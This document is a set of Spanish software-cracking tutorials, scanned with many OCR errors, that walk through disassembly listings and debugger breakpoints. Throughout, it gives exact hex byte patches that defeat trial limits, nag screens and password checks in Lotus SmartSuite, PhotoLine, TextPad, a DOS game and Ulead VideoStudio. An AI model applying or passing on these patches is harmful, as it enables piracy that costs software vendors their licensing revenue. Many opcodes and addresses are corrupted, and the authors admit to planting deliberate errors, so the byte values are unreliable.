0001D33 8B45E4 mov eax, dword ptr [ebp-1C] 

0001D36 2BD2 sub edx, edx 

0001D38 F7F3 div ebx 

0001D3A 2BC8 sub ecx, eax <--- DIAS QUE NOS QUEDAN 


dword ptr [10015B3C], ecx 


* Possible Reference to String Resource ID=00001: "4" 


0001D42 C745EC01000000 mov [ebp-14], 00000001 <-- FLAG 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :10001CBC(U), :10001CDE(U), :10001D17(U) 


:10001D49 837DEC00 cmp dword ptr [ebp-14], 00000000 


* Reference To: 


0001D4D 0F8E4D000000 jle 10001DA0 

0001D53 8B45E8 mov eax, dword ptr [ebp-18] 
0001D56 8945E0 mov dword ptr [ebp-20], eax 
0001D59 6A00 push 00000000 

0001D5B 6A00 push 00000000 

0001D5D 8B4510 mov eax, dword ptr [ebp+10] 
0001D60 50 push eax 

0001D61 E897020000 call 10001FFD 

0001D66 830404 add esp, 00000004 

0001D69 50 push eax 

0001D6A 8B45F4 mov eax, dword ptr [ebp-0C] 
0001D6D 50 push eax 


KERNEL32.WriteFile, Ord:024Fh 


0001D84 FF15CCB30110 Call dword ptr [1001B3CC] 
0001D8A 6A00 push 00000000 
0001D8C 8D45FC lea eax, dword ptr [ebp-04] 
0001D8F 50 push eax 

* Possible Reference to String Resource ID=00004: "ltsuite.exe" 
0001D90 6A04 push 00000004 
0001D92 8D45E0 lea eax, dword ptr [ebp-20] <-- AQUI 
0001D95 50 push eax 
0001D96 8B45F4 mov eax, dword ptr [ebp-0C] 
0001D99 50 push eax 

* Reference To: KERNEL32.WriteFile, Ord:024Fh 
0001D9A FF15CCB30110 Call dword ptr [1001B3CC] 


* Referenced by a 
:10001D4D(C) 


(U)nconditional 


or (C)onditional Jump at Address: 


0001DAO0 68408D0110 push 10018D40 
0001DA5 68388D0110 push 10018D38 
O0001DAA 68308D0110 push 10018D30 
0001DAF 8B45F4 mov eax, dword ptr [ebp-0C] 
0001DB2 50 push eax 

* Reference To: KERNEL32.SetFileTime, Ord:01F9h 
0001DB3 FF15C8B30110 Call dword ptr [1001B3C8] 
0001DB9 8B45F4 mov eax, dword ptr [ebp-0C] 
0001DBC 50 push eax 


* Reference To: 


KERNEL32.CloseHandle, Ord:0016h 


UNA CUESTION DE ESTETICA 


¿Como podemos evitar que nos aparezca esa pesadisima NAG SCREEN al comienzo de cada programa? 
Veamos, como he dicho al principio de este tutorial, esta NAG SCREEN apesta a "dialogboxparama". Asi 
que ponemos un breakpoint "bpx dialogboxparama" F11 y aterrizamos en :004012A4 Call dword ptr 
[00404264] (Estamos dentro del archivo ltsuite.exe) 


:0040128E 8B5D08 
:00401291 8BCF 


mov ebx, dword ptr [ebp+08] 
mov ecx, edi 


:00401293 53 push ebx 
:00401294 E827FEFFFF call 004010C0 
:00401299 57 push edi 


:0040129A 68E0124000 
:0040129F 6A00 


push 004012EÉ0 
push 00000000 


* Reference To: USER32.DialogBoxParamA, Ord:008Ah 


:004012A4 FF1564A24000 Call dword ptr [0040A264] <--- APARECEMOS AQUI 


:004012AA 8B4DF4 mov ecx, dword ptr [ebp-0C] 
:004012AD 5F pop edi 

:004012AE 64890D00000000 mov dword ptr fs: [00000000], ecx 
:004012B5 5E pop esi 

:004012B6 5B pop ebx 


:004012B7 8BE5 mov esp, ebp 


:004012B9 5D pop ebp 
:004012BA C21000 ret 0010 


Si pulsamos el boton "OK" nos devolvera el valor 10. Asi que vamos a provocar que el propio programa nos pulse el boton 
automaticamente y no nos de ni tiempo a ver esa NAG 


En :00401299 57 PUSH EDI 
(699h) 


Lo cambiamos Por 


:00401299 B810000000 MOV EAX,10 


En :0040129 
(69Eh) 


2 


Lo cambiamos Por EBOA JMP 004012AA 


Finalmente :004012A0 00 
(6a0h) 


Lo cambiamos por 90 (NOP) 


PARCHES: 


1) compnent/ltsuite.exe 
En este archivo vamos a parchear para quitar la Nag inicial 


:00401299 57 PUSH EDI 


POR :00401299 B810000000 MOV EAX, 10 


En :0040129 


q 


POR EB0OA JMP 004012AA 


En :004012A0 00 


POR 90 (NOP) 


Tenemos que buscar: 5768E01240006A00 
Y reemplazarla por B810000000EBOA90 
(699h) 


2a) ARCHIVO LTSMKTO1.DLL [CASO A] 
Corresponde a las versiones RELEASE 9 for Windows N9.0.9805.2800 


wordpro/ltsmkt01.d11 version 1.0.0.1 Tamaño 305.664 bytes 
scrncam/ltsmkt01.d11 version 1.0.0.1 Tamaño 305.664 bytes 
approach/ltsmkt01.d11 version 1.0.0.1 Tamaño 305.664 bytes 
123/1tsmkt01.d11 version 1.0.0.1 Tamaño 305.664 bytes 
organize/ltsmkt01.d11 version 1.0.0.1 Tamaño 305.664 bytes 


:10001CC7 0F8316000000 JNB 10001C 


[a] 
w 


POR 


:10001CC7 0F8516000000 JNE 10001CE3 


Y :10001D00 0F8316000000 JNB 10001D1C 


POR 


:10001D00 0F8516000000 JNE 10001D1C 


Finalmente en :10001D3A 2BC8 SUB ECX,EAX 


POR :10001D3A 90 Y :10001D3A 90 


Asi pues, buscamos con el Ultraedit (o cualquier otro editor hexa) 
"(F8316000000" y lo reemplazamos por "0F8516000000" 


Y DESPUES buscamos "2BC8890D" y lo reemplazamos por "9090890D" 


2b) ARCHIVO LTSMKT01.DLL [CASO B] Corresponde a las versiones: 


LOTUS Freelance Graphics RELEASE 9 for Windows N9.0.9805.2000 
f1g/ltsmkt01.d11 version 1.0.0.1 Tamaño 306.176 bytes 


LOTUS FastSite RELEASE 1 for Windows N1.0.0.78f 
fastsite/ltsmkt01.d11 version 1.0.0.1 Tamaño 306.176 bytes 


En este Caso , el archivo es distinto al del caso A, pero estamos 
en la misma situacion. Realizamos la misma busqueda que en el caso A, 
es decir: 


"0F8316000000" y lo reemplazamos por "0F8516000000" 
(Aqui solo encontramos una) 


Y DESPUES buscamos "2BC8890D" y lo reemplazamos por "9090890D" 


Creo que no hace falta que te recuerde el propósito de estos tutoriales. ¿no? 


NOTA: Estos tutoriales pueden contener errores intencionados (puede ser que el autor se haya saltado la 
explicación de algún paso, errores en las direcciones de memoria......etc). 
El objetivo es que aprendas a crackear y que tengas ideas propias. ;0) 
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Introducción 


El objetivo sera que no caduque nunca el programa y evitar la Nag- 
Screen. 


Al Atake 


Cuando arrancamos el programa, nos saldra la pantalla de la aplicacion 
e inmediatamente despues, sale la Nag-Screen que es la misma que 
sale cuando se pide el menu ? / About PhoLine..., diciendo que es una 
version de evaluacion y el día en el que nos encontramos de un total de 
30. 

Ademas de esto, hace una pausa de 10 segundos en modo Modal. 


Si adelantamos el reloj del ordenador mas de 30 dias y ejecutamos el 
programa, vemos que sigue funcionando pero, si os fijais, el periodo 
que llevamos usando el programa, sale con letras rojas. 

Esto supongo que es un aviso de que te has pasado del tiempo, pero el 
programa sigue funcionando. 


Visto esto, se puede llegar a la conclusion de que en algun momento 
del programa, tiene que comprobar el numero de dias que llevamos 
usando el programa con el valor 1E que es 30 en hexadecimal. 

Esta comprobacion la realizan el 95% (si no es mas) de los programas 
que son de XX dias de evaluacion. 


Empezaremos por desensamblar una copia del fichero PhotoLine.exe 
y salvar el codigo resultante. 

En este punto, cojeremos la opcion de Find Text y buscaremos el 
texto 0000001E pero solo en los casos de que sea una comparacion, 
CMP, de algo con este valor. 


Vemos que nos aparecen 7 ocurrencias en las lineas : 


:0042CCC0 83F81E cmp eax, 0000001E 
:0044F107 83F81E cmp eax, 0000001E 
:00471BB8 83FE1E cmp esi, 0000001E 
:00478185 83F81E cmp eax, 0000001E 
:004E75F5 83F81E cmp eax, 0000001ÉE 
:004E761A 83F81E cmp eax, 0000001E 
:00583137 83FB1E cmp ebx, 0000001E 


Ahora lo que haremos, sera poner un BreakPoint en el Softlce en cada 
una de las lineas para ver cual es la comparacion que hace cuando se 
arranca el programa para saber si llevamos mas de 30 dias. 


Cargar el Symbol Loader y seleccionar la opcion File / Open Module 
y buscar el fichero PhotoLine.exe, que es el que arranca el programa y 


seleccionar la opcion Module / Load. 
Seguidamente, saltaremos a la pantalla del Softlce para que pongamos 
los BreakPoints que queramos. 


Poner un BreakPoint para cada una de las lineas que teniamos con la 
comparacion de O0000001E de la siguiente manera: 


bpx 0042CCC0 
bpx 0044F107 
bpx 00471BB8 
bpx 00478185 
bpx 004E75F5 
bpx 004E761A 
bpx 00583137 


Seguidamente, pulsaremos la tecla F5 para volver al Symbol Loader y 
que se ejecute el programa. 


Automaticamente, saltaremos al Softlce, en la linea :00471BB$8, que 
es uno de los BreakPoints que pusimos. Pulsaremos F5 para que 
continue la ejecucion del programa y veremos que vuelve a aparecer el 
Softlce en la misma linea :00471BB$8. 

Si en este punto pulsamos la tecla F4, veremos que hasta este punto, en 
el monitor, tenemos la pantalla de trabajo del PhotoLine. 

Volver a pulsar la tecla F4 para volver al SoftlIce. 

Pulsar FS para que continue la ejecucion y nos saldra la Nag-Screen 
informandonos del numero de dias que llevamos usando el programa, 
etc... y una para de 10 segundos. 


Bien, ahora ya sabemos en que linea hace la comprobacion de los 30 
dias. 

Volvamos al W32Dasm y vayamos a la parte de codigo perteneciente a 
esa linea: 


* Possible StringData Ref from Data Obj] -— 
>"4,53" 

| 

:00471B7A 68C87F5E00 push 005E7FC8 

:00471B7F 8D4DE0O lea ecx, dword ptr [ebp-20] 
:00471B82 E8B95A0600 call 004D7640 

:00471B87 8D45E0 lea eax, dword ptr [ebp-20] 
:00471B8A 8D4DEC lea ecx, dword ptr [ebp-14] 
:00471B8D 50 push eax 


:00471B8E 
:00471B8F 
:00471B94 
:00471B97 


51 push ecx 

E8BC3B0100 call 00485750 
83C408 add esp, 00000008 
E8E48DFDFF call 0044A980 


:00471B9C 
:00471B9F 
esto 2??? 
:00471BA5 
:00471BAA 
:00471BAC 
:00471BAF 
:00471BB4 
:00471BB8 


6685C0 test ax, ax 
0F859Cc010000 jne 00471D41 <-—— Que es 


E8E6650000 call 00478190 
8BF0O mov esi, eax 

8D4D80 lea ecx, dword ptr 
E84C100F00 call 00562C00 
C645FC08 mov [ebp-04], 08 
83FE1E cmp esi, 0000001E <--— 
Comprueba si llevamos 30 dias 

:00471BBB 7E07 jle 00471BC4 <--— Salto si son 30 
o menos dias 

:00471BBD 68C0776200 push 006277C0 

:00471BC2 EBO5 jmp 00471BC9 


[ebp-80] 


Como se puede observar, la forma de parchear el programa, seria que 
siempre hiciera el salto de la linea :00471BBB pero lo unico que 
conseguiriamos, seria que el programa no caducara nunca pero nos 
seguiria saliendo la Nag-Screen y la pausa de 10 segundos. 

Esta no es la solucion mas idonea. 


Si miramos unas lineas hacia arriba, podemos observar que en la linea 
:00471B9F hay un salto condicional que viene dado por el valor 
devuelto en AX en la llamada a 0044A980. 

Vayamos pues a la parte de codigo de esta llamada: 


* Referenced by a CALL at Addresses: 
|:00471B97 , :004F2C5E 

| 

:0044A980 E8S7BF8FFFF call 0044A200 <--— Viene 
desde :004'71B97 

:0044A985 8BC8 mov ecx, eax 

:0044A987 E9E4D50200 Jjmp 00477F70 <-— Salto 
incondicional 


Como vemos, ademas de la referencia que nos a traido hasta aqui, hay 
otra referencia mas. 

Esto quiere decir que desde algun otro punto del programa, se mira 
tambien si esta registrado o no, con lo cual, la primera solucion queda 
claro que no es la correcta. 


Sigamos el programa y vayamos al salto incondicional que hay en la 
linea :0044A987 y que hace referencia a 00477F70. 
Veamos esta parte de codigo: 


* Referenced by a CALL at Addresses: 
| :00477E1D , :00478170 , :00478447 , :004E49D9 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 

| :0044A987 (U) 

| 

:00477F70 64A100000000 mov eax, dword ptr 
fs: [00000000] 

:00477F76 55 push ebp 

:00477F77 8BEC mov ebp, esp 

:00477E79 G6AFF push FEFEFEFEF 

:00477F7B 68C7804700 push 004780C7 

:00477F80 50 push eax 

:00477F81 64892500000000 mov dword ptr 
fs:[00000000], esp 

:00477F88 83EC3C sub esp, 0000003C 

:00477F8B 8D4DC4 lea ecx, dword ptr [ebp-3C] 
:00477F8E E87DF10500 call 004D7110 

:00477F93 C745FC00000000 mov [ebp-04], 00000000 
:00477F9A 8D4DE8 lea ecx, dword ptr [ebp-18] 
:00477F9D E8S6EF10500 call 004D7110 

:00477FA2 6A01 push 00000001 

:00477FA4 8D4DDO lea ecx, dword ptr [ebp-30] 
:00477FA7 C645FCO1 mov [ebp-04], 01 


* Possible StringData Ref from Data Obj] -— 
>"SerialNumber400" 

| 

:00477FAB 6864815E00 push 005E8164 
:00477FB0 E87BF10500 call 004D7130 
:00477FB5 50 push eax 

:00477FB6 8D4DB8 lea ecx, dword ptr [ebp-48] 
:00477FB9 C645FC02 mov [ebp-04], 02 
:00477FBD 6A00 push 00000000 

:00477FBF E8CCF10500 call 004D7190 
:00477FC4 C645FC03 mov [ebp-04], 03 
:00477FC8 50 push eax 


:00477EFC9 
:00477FCC 
:00477FCD 
:00477FD2 
:00477EFD5 
:00477EFD8 
:00477FDC 
:00477FDD 
:00477FE2 
:00477FE3 
:00477FE6 
:00477FEB 
:00477FEF 
:00477FF4 
:00477FF8 
:00477FFD 
:00478001 
:00478006 
:00478009 
:0047800E 
:00478010 
salto 
:00478012 
:00478015 
:0047801A 
:0047801€ 
:0047801F 
:00478021 
:00478024 
:00478027 
:00478028 
:0047802D 
:0047802E 
:00478031 
:00478035 
:0047803A 
:0047803E 
:00478043 
:00478046 
:0047804B 
:0047804E 
:00478051 
:00478052 
:00478057 
:0047805B 


8D45DC lea eax, 
50 push eax 
E81E26FDFF call 0044A5F0 
83C40C add esp, 0000000C 
8D4DC4 lea ecx, dword ptr 
C645FC04 mov [ebp-04], 04 
50 push eax 

E86EF40500 call 004D7450 
50 push eax 

8D4DE8 lea ecx, dword ptr 
E865F40500 call 004D7450 
C645FC03 mov [ebp-04]1, 03 
E8C3000000 call 004780B7 
C645FC02 mov [ebp-04], 02 
E8AA000000 call 004780A7 
C645FCO01 mov [ebp-04], Ol 
E8A9000000 call 004780AF 
8D4DE8 lea ecx, dword ptr 
E802F80500 call 004D7810 
85C0 test eax, eax 


dword ptr 


[ebp-24] 


[ebp-3C] 


[ebp-18] 


[ebp-18] 


747B je 0047808D <--— Evitar este 


8D4DE8 lea ecx, dword ptr 
E826F50500 call 004D7540 
6A01 push 00000001 

8D4DE8 lea ecx, dword ptr 
6A20 push 00000020 
8945D8 mov dword ptr 
8D45DC lea eax, dword ptr 
50 push eax 

ESF3FA0500 call 004D7B20 
50 push eax 

8D4DE8 lea ecx, dword ptr 
C645FCO5D mov [ebp-04]1, 05 
E816F40500 call 004D7450 
C645FCO01 mov [ebp-04], Ol 
E842000000 call 00478085 
8D4DE8 lea ecx, dword ptr 
E8F5F40500 call 004D7540 
8945D4 mov dword ptr 
8D45D4 lea eax, dword ptr 
50 push eax 

E889000000 call 0047800 
668945E6 mov word ptr 
83C404 add esp, 00000004 


[ebp-28], 


[ebp-2C], 


[ebp-1A] , 


[ebp-18] 


[ebp-18] 


eax 
[ebp-24] 


[ebp-18] 


[ebp-18] 


eax 
[ebp-2C] 


ax 


:0047805E 
:00478062 
:00478067 
:0047806E 
:00478073 


C645FC00 mov [ebp-04], 00 
E858000000 call 004780BF 
C745FCEFFEFFFF mov 
E85E000000 call 004780D1 
668B45E6 mov ax, word ptr 


[ebp-04] , 


[ebp-1A] 


FFFFEFFEFE 


<= 


Forzar un 1 en AX 

* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 

| :004780A5 (U) 

| 

:00478077 8B4DF4 mov ecx, dword ptr 
:0047807A 8BE5 mov esp, ebp 
:0047807C 64890D00000000 mov dword ptr 
fs:[00000000], ecx 

:00478083 5D pop ebp 

:00478084 C3 ret 


[ebp-0C] 


Si seguimos esta parte de codigo, vemos que en la linea :00478010 hay 
un salto condicional dado por la comparacion de la linea anterior a que 
el registro EAX sea igual a 0. 

En este caso, salta a la linea 0047808D que contiene el codigo: 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 

| :00478010(C) 

| 
:0047808D 
:00478091 
:00478096 
:0047809D 
:004780A2 
:004780A5 


C645FCO0O mov [ebp-04], 00 
E829000000 call 004780BF 
C745FCEFEFEFFEF mov [ebp-04], 
E82F000000 call 004780D1 
6633C0 xor ax, ax 

EBDO 3jmp 00478077 


FFEFFEFFEE 


Este codigo, como podemos ver, es error ya que hace un XOR AX, 
AX con lo que se pone dicho registro a O y si recordamos, se espera un 
valor distinto de O en AX para que el registro sea correcto. 

Visto esto, volvamos al codigo anterior a la linea :00478012 y sigamos 
mirandolo. 


Llegaremos a la linea :00478073 que mueve algo a AX. Sea lo que sea 
lo que mueve, a nosotros nos interesa que este valor sea distinto de 0. 


Con todo esto, llegamos a la siguiente conclusion: 


En la linea :00478010 no se tiene que hacer el salto ya que dicho salto 
es error. 
En la linea :00478073 hay que poner un 1 en AX. 


Para realizar esto, ejecutaremos el Hex Workshop, abriremos el fichero 
PhotoLine.exe y buscaremos las siguientes cadenas y las sustituiremos: 


85 CO 74 7B 8D 4D ES <-- Buscar esto 
33 CO 40 90 8D 4D E8 <-- Cambiar por esto 


66 8B 45 E6 8B 4D F4 8B <-- Buscar esto 
66 B8 01 00 8B 4D F4 8B <-- Cambiar por esto 


Salvar las modificaciones y ahora ya podemos desactivar el 
BreakPoint que teniamos, pulsando CTRL+D para entrar en el Softlce 
y escribir: 


bd 00 


Pulsar FS para volver a Windows. 


Ahora el programa no caducara nunca y tampoco saldra la Nag-Screen. 
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Introducción 


Parece que el programa es totalmente funcional y tan sólo aparece una pantallita al 
iniciar que nos recuerda que es ShareWare, y que desaparece solita en unos 
segundos. 


En el programa no hay ninguna opción para registrarse, así que supongo que al 
pagar te deben enviar algun fichero que te registra. 


Podemos recordar que el programa es Share Ware mirando en la opción About, así 
que no hace falta que nos lo diga cada vez que arrancamos. Vamos a investigar... ;- 


) 


Al Atake 


Al empezar, el programa busca en el registro (en Software HeliosiTextPad Security) un valor 
de 3 caracteres para "Capabilities”, que no puede encontrar ;-( 

Se podría generar esa clave a mano en el registro, y ver que hace luego con ella. 

Con el Softlce se haría poniendo un BreakPoint en la dirección de memoria donde almacena 
ese valor. 

O sea, BPM 0137:4F34BO0 pero como la cosa se lia un poco, vamos a lo bruto... 


Una vez abierto y cargado el TxtPad32.exe con el Debugger WDasm v8.9, vamos a poner un 
BreakPoint para RegOpenKeyExA con "Software MHeliosTextPadiSecurity", o sea en 
:40CD68 

Se puede encontrar esta dirección mirando en la opción Refs/String Data References, 
buscando el texto "Security", y haciendo doble click sobre él. Con F2 se marca el BreakPoint. 


Ejecutamos el programa (F9), y se para por el BreakPoint. 

Como vamos a saco, le damos al Auto Step Over (F6), y estamos atentos para fijarnos en que 
momento aparece la pantalla de ShareWare. 

Si hemos afinado la vista (o en su defecto hemos repetido la operación acotando cada vez un 
poco más y avanzando a mano con F8), encontraremos la llamada en :44CD3C call 440431 , 
que podría ser algo así como Call Muestra_Pantalla_de_Share Ware. 

Miramos una linias más arriba para ver si hay alguna instrucción que se salte esa llamada : 


:0044CD1C 8B7DFO mov edi, dword ptr [ebp-10] 
:0044CD1F 81C7D0000000 add edi, 000000DO 

:0044CD25 8BOF mov ecx, dword ptr [edi] 
:0044CD27 85C9 test ecx, ecx 

:0044CD29 742C je 0044CD57 

:0044CD2B 53 push ebx 

:0044CD2C 8BO1 mov eax, dword ptr [ecx] 
:0044CD2E FF90D4000000 call dword ptr [eax+000000D4] 
:0044CD34 85C0 test eax, eax 

:0044CD36 741F je 0044CD57 

:0044CD38 6A05 push 00000005 

:0044CD3A 8BOF mov ecx, dword ptr [edi] 
:0044CD3C E8F0360500 cal1 004A0431 


Si en :44CD29 hiciera el salto, no se mostraría la pantallita de shareware. 

Así que para que ello ocurra, cambiamos la instrucción de :44CD23 por xor ecx,ecx 
Seguimos ejecutando, y vemos que todo parece estar ok. 

Esto es ir a saco... ;DDD 


Para dejar los cambios permanentes, hay que modificar el fichero TxtPad32.exe 

La instrucción a parchear está en :44CD25 en el código, que el Wdasm nos dice que es el 
offset 4C125 del fichero TxtPad32.exe 

Así que con un editor hexadecimal nos vamos a la posición 4C125, y cambiamos 8BOF por 
33C9 


Salvamos, y yatá. 
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progrAmA Logical DOS 
| DESCripCión [Juego de lógica y habilidad. 
O 
| protECCión — |Hay que introducir una password para empezar a jugar 
| DiFiCultAD — [1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| hErrAmiEntAs — |Debug, Editor Hexadecimal (Dis85) 
a MBR 
rra ade 


Wen 


Introducción 


Al empezar sale una pantalla en donde hay que poner una clave que aparece en el 
manual impreso del juego. 

Aunque tenga el programa original, es un rollo tener que buscar la clave cada vez. 
Lo ideal sería que no la pidiese, o que acceptara cualquier valor como válido. ;-) 


VM 


Al Atake 


Ya ha pasado un tiempo desde que me miré este programa, pero como tengo unas 
notas en un papelucho, las pongo aquí para quien esté interesado. 


Es de los tiempos del Dos y lo debugué con el pam DEBUG (que está incluido en 
el ss.oo MsDos) 

Me parece que la dificultad que me encontré era por culpa del modo gráfico del 
juego, que hacía que le perdiera la vista al debug, y de que era la primera vez que 
intentaba una desprotección. 


Bueno, lo que tengo apuntado que había que hacer es : 


- Desde 358F:0E, (o sea el principio) 


GO 2a 

T 

-— Desde 74E0:2E, 
GO 154 

T 

E 

-— Desde 1F71:0, 
GO 1f 

db 


- Ahora estamos situados en 1339:59 


Nota: Puede que los segmentos sean diferentes según la configuración del Pc. 
En el offset :20C hay este código : 


1339:020C call 9BDA 


1339:020F mov si, ax 
1339:0211 cmp si, +01 
1339:0214 jnz 0219 
1339:0216 Jjmp 02A7 


Tengo apuntado que el call 9BDA muestra la pantalla del código, y que el jnz 219 
saltaba si se ponía una clave errónea. 

Así pues, al cambiar ¡nz 219 por nop,nop cualquier clave será considerada correcta. 
y) 

Lo que no recuerdo es si se puede "nopear" también la llamada que muestra la 
pantalla. 


Para dejar el parche en el fichero exe, lo hice con el Dis86 : 


22la:fffddbco nop (90 en hexa) 
22la:fffddbcó nop (90 en hexa) 


OS 
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Programa Ulead Video Studio v3.0 | W95 / W98 / NT 
| Descripción | ción de de 
o Tipo ¡Trial de 15 días con algunas otras limitaciones 

Un up 


——onjetivo [Que el programa funcione sin restricciones. 


Introducción 


Vídeo Studio 3.0 es una aplicación que permite editar clips de vídeo en formatos 
AVI y MPEG. La aplicación te permite también capturar vídeo mediante una cámara 
digital o una tarjeta capturadora de vídeo. 

Es una versión tryout que tiene las siguientes limitaciones: 


1. Solamente funciona durante 15 días. 
2. Limita la duración de los videos a 30 segundos. 
3. Solo se permite 35 transacciones por vídeo. 


Al Atake 


Empecemos pues... 

Ejecutemos a nuestro amigo y probemos el programa. He creado un vídeo muy 
chulo, pero ocupa más de 30 segundos y cuando lo intento guardar en formato AVI 
me dice que no quiere. 

Esto no quedara quedara así, mira que plantarme cara!! :)) La ventana que aparece 
tiene toda la pinta de ser un MessageBox, por lo que ponemos el cebo en las 
funciones MessageBoxA y MessageBoxExA a ver si pica. VAYA!!!! No ha picado 
Entonces probaremos a poner un breakpoint cuando se destruya la ventana. Para ello 
ejecutamos el comando bmsg 020C wm_destroy, recuerda que 020c es el handle de 
la ventana y seguramente tu no tendrás el mismo, por lo que tendrás que averiguarlo 
(se puede averiguar con el comando hwnd). 

Probamos nuestro nuevo cebo y.... BINGO, el SoftICE ha despertado, jejee 
Después de unos cuantos F12 aparecemos aquí: 


0044678A mov  ecx, eax 

0044678C call ds: ??PCuTimelCOBERVOREZ ; 
CuTime: :operator>= (CuTime) 

00446792 test eax, eax <-- Que interesante. 
00446794  3z 004467AA 

00446796 push ebx 

00446797 push 8291h 

0044679C€ push ebx 

0044679D call 004149C0 

004467A2 add esp, 0Ch <-- Tu vuelves aqui. 
004467A5 jmp 00447033 

004467AA mov eax, 004B2310 


Bien, aquí tenemos algo interesante. :)) 

En la línea 0044678C se llama a la función PCuTime  ECOBEHVOC EZ, que 
según parece sirve para calcular si un vídeo dura mas o igual que otro. Pero lo que a 
nosotros nos interesa es la línea 00446794, donde salta o no (tenemos que hacer que 
salte para quitar esta limitación, por lo que tenemos varias opciones: 


1. Cambiar el jz por un ¡mp 
2. Cambiar el test eax, eax por un xor eax, eax 


Si optamos por la primera, cuando saltemos eax valdrá 1 y si cogemos la segunda 
eax valdrá 0. yo me he decidido por la segunda, ya que en este caso eax=0 que es lo 
que debería de devolver al call anterior si el vídeo tuviera menos de 30 segundos. Es 
posible que esto no influya en nada, pero quizás el autor utilice el valor de eax para 
algo y se estropee nuestro vídeo, así que por si las moscas.... 


> , 
ha 


Siguiente objetivo. 


Bien, ahora ya podemos hacer producciones más largas, pero todavía tenemos mas problemas. 
El programa caduca a los 15 días (o no te acordabas). Veamos como se comporta pasado este 
tiempo. Adelantemos el reloj 2 meses (mas vale que sobre, no??) y ejecutemos el programa. 
Vaya, aparece una ventana muy fea diciendo que ha caducado: 


Ulead VideoStudio 3.0 ES | 


Vin A VERSION 3.0 


Your 15-day trial period for Ulead VideoStudio 3.0 has expired. 


We hope you've enjoyed using Ulead VideoStudio 3.0 - The Fastest Way to Great Home 
Wideos! Find out how you can order the full version of Ulead VideoStudio 3.0 by clicking the 
'Order Now! button below. Remember that you will get Ulead VideoStudio with a guided 
step-by-step process to make editing and enhancina video easier and faster. Plus, you! 
receive professional video clips, 1000 sound effects, 500 photos, a 20-minute 

How-to introductory video on CD, and a Storyboard Planner, for FREE!l/nDon!t delay and 
Order Now! 


To learn more about Ulead Systems" other video and multimedia solutions, please visit cur 
web site at http: ¿2 ulead. com. 


01998 Ulead Systems, Inc. 


Js: Order Now! | Link to Web Site | 


Vamos a actuar igual que antes: poniendo un breakpoint cuando se cierre la ventana (recuerda 
que es el evento wm_destroy). Y tras un par de F12 llegamos aquí: 


0041A35C push ecx 

0041A35D push eax 

0041A35E call 3j_ulcChecklLegality 

0041A363 test eax, eax <-- Tu vuelves aqui. 
0041A365 3z short loc_41A3A0 

0041A367 cmp [esp+1E8h+var_70], 515h 
0041A372 3jnz short loc_41A382 

0041A374 push offset aTrial 

0041A379 lea ecx, [esp+1ECh+var_1DC] 


Bien, según parece hemos regresado un una función llamada CheckLegality. que es la que 
comprueba el tiempo transcurrido (porque el programador no aprende y por lo menos esconde lo 
que hace la función con otro nombre menos significativo??). 

Veamos que es lo que hace esta función (se encuentra en el la DLL u32cfg.dll): 


¡¿Subroutine 
; Attributes: bp-based frame 


public ulcChecklLegality 
ulcCheckLegality proc near 


arg_0 = dword ptr 8 
arg_4 dword ptr 0Ch 


4EBO5E40 push ebp 

4EB05E41 mov ebp, esp 
4EB05E43 push 0 

4EBO5E45 push 1 

4EB05E47 mov eax, [ebptarg_4] 
4EBO5E4A push eax 

4EBO5E4B mov ecx, [ebptarg_0] 
¿4EBO5E4E push ecx 

4EBO5E4F call GetModulelnfo 
4EBO5E54 add esp, 10h 
4EBO5E57 neg eax 

¿4EBO5E59 sbb eax, eax 
¿4EBO5E5B neg eax 

¿4EBO5E5D pop ebp 

¿4EBO5E5E retn 8 
ulcCheckLegality endp 


Si jugamos un poco con esta función, nos damos cuenta que el call de la línea 4EBOSE4F es el 
que muestra la ventana y devuelve en eax O (si nos fijamos un poco nos daremos cuenta que 
debería de devolver 1 para que todo fuera como deseamos). Así que retocamos la función con 
los siguientes cambios: 


1. La línea 4EBO5E4F la sustituimos por nops (tantos como sea necesario). Así quitamos 
la ventana tan fea. 

2. Necesitamos que se devuelva 1 en eax, por lo que sustituimos las líneas 4EBO5E57 a 
4EBOSE5B por un mov eax, 1 y tantos nops como sea necesario. 


Con esto conseguimos engañar al programa. :)) 


» 
VA 
Ha sido fácil, no? 


Con estos cambios el programa ya no caduca y podemos hacer los videos tan largos 
como queramos. 

Pero me he dado cuenta que con solo el ultimo cambio, el programa no se queja de 
que los videos superan los 30 segundos, y tampoco me ha puesto ninguna pega al 
poner mas de 35 transacciones, por lo que supongo que con solo parchear la función 
ulcCheckLegality el programa funcionará correctamente. 


Una ultima palabra. 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] | 
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Whiskey Kon Tekila 


Programa English-Spanish Interpreter 2000 | WO9S / W98 / NT 
Descripción Traducción y lectura de textos. 
Tipo Demo totalmente funcional. Número limitado de usos (4) 


Url http://ssl.pair.com/magicw 


Introducción 


La primera vez que ejecutamos este software aparece una splash de tintes futuristas 
que se desvanece para dar paso a un programa totalmente funcional. 

La segunda vez ocurre lo mismo. 

A la tercera ocasión, aparece además una NAG más fea que un pecado que nos 
recuerda que SÓLO nos quedan 2 usos del programa y nos da a elegir entre teclear 
un “Registration Number” o proceder en modo “Free Demo”. 

Después de insistir en el penoso recordatorio, y una vez agotados los 4 usos 
volvemos a ejecutar para encontrar una curiosa amenaza: “El programa NO 
funcionará correctamente a partir de ahora”.... 

Ñtchs...! Donde habeis estudiado marketing...? Por correspondencia...? NUNCA se 
debe degradar el producto que se vende. Ni siquiera para protegerlo. Crea mala 
imagen. 


Pero veamos como se lleva a cabo la amenaza. Durante los 4 primeros usos 
“DEMO”, pedi la traducción al castellano de: 


“Do you think I am completely stupid?.” 


A lo que el bicho respondio (con una voz que la daba un susto al miedo): 
“Piensa usted que soy completamente estúpido?.” 


Cuando formulé la misma pregunta en modo “EXPIRED” el muy imbécil 
respondió: 


“Hace usted lo imposible?.” 


Despues de probar algunas frases, comprendi que, sin registrar, generaba las 
traducciones de forma aleatoria.... 


Os 
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Primer intento: estudio del algoritmo del número de serie 

El primer intento, como siempre, es obtener el algoritmo de comprobación del 

número de serie e invertirlo para generar un keymaker. El algoritmo, en este caso, 

es un genuino ejemplo de spaghetti-code que activa, durante la comprobación de 

validez, un elevadísimo número de flags no binarios que son chequeados durante 

toda la sesión de uso del software... Ok, no es imposible pero puede llevar muchas, 

